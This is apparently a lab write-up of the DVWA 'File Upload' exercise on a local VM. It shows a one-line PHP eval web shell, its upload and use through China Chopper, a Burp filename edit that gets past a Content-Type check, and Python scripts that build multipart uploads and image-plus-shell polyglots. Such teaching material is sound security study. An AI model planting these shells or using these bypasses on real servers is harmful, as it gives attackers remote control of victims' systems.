DVWA exercise 05: File Upload
2022-07-06 14:47:00 【Fuki is on the way】
Target IP: 192.168.142.133
Local (attacker) IP: 192.168.142.134
1.Security Level:Low
The code is as follows
At this level the server performs no check at all on the uploaded file; it is stored under hackable/uploads/ with its original name. Locally, create muma.php containing the one-sentence PHP Trojan (a web shell that eval()s whatever arrives in the POST parameter named test): <?php @eval($_POST['test']); ?>
(Use ASCII punctuation: full-width Chinese quotes, brackets or semicolons will break the PHP.)
Upload the file through DVWA's file upload page.
The page returns the path where the file was saved.
Go to that folder on the target and confirm the file is there.
Before connecting with China Chopper there was one problem. The new version of phpStudy defaults to PHP 7, and the China Chopper connection failed; switching to PHP 5 fixed it. (After changing the version my DVWA broke and I had to reinstall it.)
Open China Chopper, right-click, Add.
Address: http://192.168.142.133/dvwa/hackable/uploads/muma.php
In the field on the right enter the word that appears in single quotes in the one-sentence Trojan, i.e. the $_POST key test (the shell's password).
Script type: PHP(Eval).
Right-click the new entry and choose Virtual Terminal.
Enter ipconfig to check the address information, but it fails.
The target VM has 360 installed; a warning window pops up whenever a system command is entered, and it is blocked by default.
Turn 360 off and try again: the command executes successfully!
The file management function can also be used to browse the target's entire filesystem and to upload, download and delete files, among other operations.
2.Security Level:Medium
Key source code :
The check at this level is on what the client declares: the Content-Type of the upload must be image/jpeg or image/png, and the size must be under 100000 bytes. Nothing looks at the file's contents or its extension. The browser sets Content-Type from the file's extension and the server trusts it, so the request can be intercepted and modified with Burp Suite to get past the check.
Rename the local muma.php to muma2.png so that the browser sends it as image/png.
Click Upload, intercept the request with Burp Suite, change the filename muma2.png to muma2.php in the Content-Disposition header (leave Content-Type: image/png as it is), and forward the request.
On the target, muma2.php has been uploaded successfully.
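The Medium-level bypass above, as an added example that is not code from DVWA or from the original post: the script builds the multipart/form-data body a browser sends to the upload form, models the Medium check in Python (it looks only at the client-declared Content-Type and the size), and reproduces the filename edit made in Burp. The form field names uploaded, Upload and MAX_FILE_SIZE and the boundary string are assumptions made for the example; the payload is the post's one-sentence shell.

```python
# Added example, not code from the DVWA project or from the original post.
# Builds the multipart body of the DVWA upload form, models the Medium-level
# server check (client-declared Content-Type and size only) and reproduces the
# Burp edit of the filename. Field names and the boundary are assumptions.
import re

PAYLOAD = b"<?php @eval($_POST['test']); ?>"   # one-sentence web shell
BOUNDARY = b"----PythonFormBoundary"           # assumed; any boundary works


def build_upload(filename: str, content_type: str, data: bytes) -> bytes:
    """Multipart body as a browser or Burp would send it (CRLF line endings)."""
    parts = [
        b"--" + BOUNDARY,
        b'Content-Disposition: form-data; name="MAX_FILE_SIZE"',
        b"",
        b"100000",
        b"--" + BOUNDARY,
        f'Content-Disposition: form-data; name="uploaded"; filename="{filename}"'.encode(),
        f"Content-Type: {content_type}".encode(),
        b"",
        data,
        b"--" + BOUNDARY,
        b'Content-Disposition: form-data; name="Upload"',
        b"",
        b"Upload",
        b"--" + BOUNDARY + b"--",
        b"",
    ]
    return b"\r\n".join(parts)


def parse_file_part(body: bytes) -> dict:
    """Server side: filename, declared type and bytes of the 'uploaded' part."""
    for part in body.split(b"--" + BOUNDARY):
        if b'name="uploaded"' not in part:
            continue
        headers, _, content = part.partition(b"\r\n\r\n")
        if content.endswith(b"\r\n"):          # CRLF that precedes the next boundary
            content = content[:-2]
        return {
            "name": re.search(rb'filename="([^"]*)"', headers).group(1).decode(),
            "type": re.search(rb"Content-Type: ([^\r\n]+)", headers).group(1).decode(),
            "size": len(content),
            "data": content,
        }
    raise ValueError("no 'uploaded' part in body")


def medium_check(body: bytes) -> bool:
    """Model of the DVWA Medium check: declared MIME type and size, nothing else."""
    f = parse_file_part(body)
    return f["type"] in ("image/jpeg", "image/png") and f["size"] < 100000


def burp_rename(body: bytes, old: str, new: str) -> bytes:
    """The edit made in Burp's intercept: change only the filename= attribute."""
    return body.replace(f'filename="{old}"'.encode(), f'filename="{new}"'.encode(), 1)


# 1. Uploading muma.php directly: the browser declares a non-image type -> rejected.
direct = build_upload("muma.php", "application/octet-stream", PAYLOAD)
# 2. Renamed to muma2.png: the browser now declares image/png -> accepted.
renamed = build_upload("muma2.png", "image/png", PAYLOAD)
# 3. Intercepted in Burp and the filename put back to .php; the declared type is
#    untouched, so the server still accepts it and stores muma2.php.
edited = burp_rename(renamed, "muma2.png", "muma2.php")

if __name__ == "__main__":
    for label, body in (("direct", direct), ("renamed", renamed), ("edited", edited)):
        verdict = "accepted" if medium_check(body) else "rejected"
        print(label, parse_file_part(body)["name"], verdict)
```

The point the script makes concrete is that the Content-Type header belongs to the request, not to the file: the server's decision is unchanged by the filename edit because it never reads the filename or the bytes.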
3.Security Level:High
The key source code is as follows :
strrpos(string, find, start) returns the position of the last occurrence of find in string, or false if it is not found; the optional start sets where the search begins.
getimagesize(string filename) reads the file header and returns the image's width, height, type and so on; if the file has no recognisable image header it returns false instead. The High-level code takes the part of the filename after the last ".", so the name must be of the form *.jpg, *.jpeg or *.png, and getimagesize() additionally requires the uploaded content to begin with an image header. Neither check looks at what follows that header.
Concatenate an image with the one-sentence Trojan file (image first) to form a new image file.
Open the new image in Notepad: the one-sentence Trojan is visible at the end.
The upload succeeds, but China Chopper cannot connect to it. I haven't found a solution for now.
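The High-level checks and the image-plus-Trojan file, as an added example that is not code from DVWA or from the original post: the script models the extension check (substring after the last ".") and stands in for getimagesize() with a small header parser for GIF and PNG, builds the concatenated file, and shows which uploads pass. The 1x1 GIF is constructed in code so the example runs offline; JPEG segment parsing is left out of the stand-in.

```python
# Added example, not code from the DVWA project or from the original post.
# Models the High-level checks (extension after the last "." plus an image
# header check standing in for PHP's getimagesize), builds the "picture +
# one-sentence Trojan" file by byte concatenation and shows which uploads pass.
import struct

PAYLOAD = b"<?php @eval($_POST['test']); ?>"   # the post's one-sentence shell
ALLOWED_EXT = ("jpg", "jpeg", "png")


def minimal_gif() -> bytes:
    """A valid 1x1 GIF89a, constructed here: header, logical screen descriptor,
    2-colour global palette, image descriptor, LZW data for one pixel, trailer."""
    header = b"GIF89a" + struct.pack("<HH", 1, 1) + b"\x80\x00\x00"
    palette = b"\x00\x00\x00\xff\xff\xff"
    image = b"\x2c" + struct.pack("<HHHH", 0, 0, 1, 1) + b"\x00"
    image += b"\x02" + b"\x02\x44\x01" + b"\x00"   # min code size, data block, terminator
    return header + palette + image + b"\x3b"


def image_size(data: bytes):
    """Stand-in for getimagesize(): (width, height, type) from the file header of
    a GIF or PNG, or None when no image header is present. PHP also walks JPEG
    segments to find the SOFn marker; that path is omitted here."""
    if data[:6] in (b"GIF87a", b"GIF89a") and len(data) >= 10:
        w, h = struct.unpack("<HH", data[6:10])
        return w, h, "gif"
    if data[:8] == b"\x89PNG\r\n\x1a\n" and data[12:16] == b"IHDR":
        w, h = struct.unpack(">II", data[16:24])
        return w, h, "png"
    return None


def high_check(filename: str, data: bytes) -> bool:
    """Model of DVWA High: the substring after strrpos(name, '.') must be
    jpg/jpeg/png and getimagesize() on the content must succeed."""
    dot = filename.rfind(".")                 # strrpos($uploaded_name, '.')
    ext = filename[dot + 1:].lower()          # substr(..., strrpos(...) + 1)
    return ext in ALLOWED_EXT and image_size(data) is not None


def make_polyglot(image: bytes, payload: bytes) -> bytes:
    """Image first so the header check passes, PHP appended after the trailer;
    the same result as 'copy /b pic.gif + muma.php new.gif' on Windows."""
    return image + payload


if __name__ == "__main__":
    gif = minimal_gif()
    for name, data in [("muma.php", PAYLOAD),
                       ("muma.jpg", PAYLOAD),
                       ("muma.jpg", make_polyglot(gif, PAYLOAD))]:
        verdict = "accepted" if high_check(name, data) else "rejected"
        print(name, len(data), "bytes:", verdict)
```

The concatenated file passes both checks and is stored under its .jpg name. Apache serves a .jpg as static content rather than handing it to the PHP engine, so the appended code is never executed on its own; that is why a web-shell client has nothing to talk to unless some other weakness makes the server interpret the file as PHP.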
References:
https://www.cnblogs.com/N0r4h/p/12257848.html
https://blog.csdn.net/weixin_39190897/article/details/86772765